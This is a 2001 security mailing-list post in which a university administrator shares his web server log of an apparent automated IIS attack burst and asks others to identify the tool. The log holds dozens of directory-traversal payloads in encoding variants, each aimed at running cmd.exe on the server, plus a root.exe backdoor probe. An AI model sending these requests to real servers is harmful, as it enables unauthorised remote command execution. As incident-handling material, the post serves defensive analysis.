Security Incidents mailing list archives

New IIS exploit tool? Has anyone seen this pattern before?

From: Thomas Haeberlen <Haeberlen () RUS Uni-Stuttgart DE>
Date: Tue, 30 Oct 2001 12:47:00 +0100
Hello everybody,

has anyone seen this pattern of IIS attacks before? Could this be a new
exploit tool or something like "nimda2"? On the other hand it seems that 
it is only trying the long known holes...

------------------------------- snip ----------------------------------

195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/root.exe?/c+dir+C:\ HTTP/1.0" 404 210 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 
404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET 
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 
404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET 
/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET 
/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET 
/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET 
/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 
404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET 
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET 
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET 
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET 
/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET 
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET 
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET 
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET 
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET 
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET 
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET 
/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET 
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET 
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET 
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET 
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET 
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 
"-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ 
HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ 
HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET 
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET 
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ 
HTTP/1.0" 404 235 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ 
HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ 
HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET 
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET 
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET 
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET 
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET 
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 
"-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET 
/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 254 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET 
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 403 258 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET 
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 256 "-" "-"
------------------------------------ snap --------------------------------

Timestamps are GMT+1. Any hints?

egards,

Thomas Haeberlen

-- 
Thomas Haeberlen
Rechenzentrum Universitaet Stuttgart (RUS)              
Abteilung Informationsdienste  
Allmandring 30 , D-70569 Stuttgart
Email: haeberlen () rus uni-stuttgart de
Phone: +49 711 685 47 19 Fax: +49 711 678 76 26

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Current thread:

New IIS exploit tool? Has anyone seen this pattern before? Thomas Haeberlen (Oct 30)
- Re: New IIS exploit tool? Has anyone seen this pattern before? CT (Oct 30)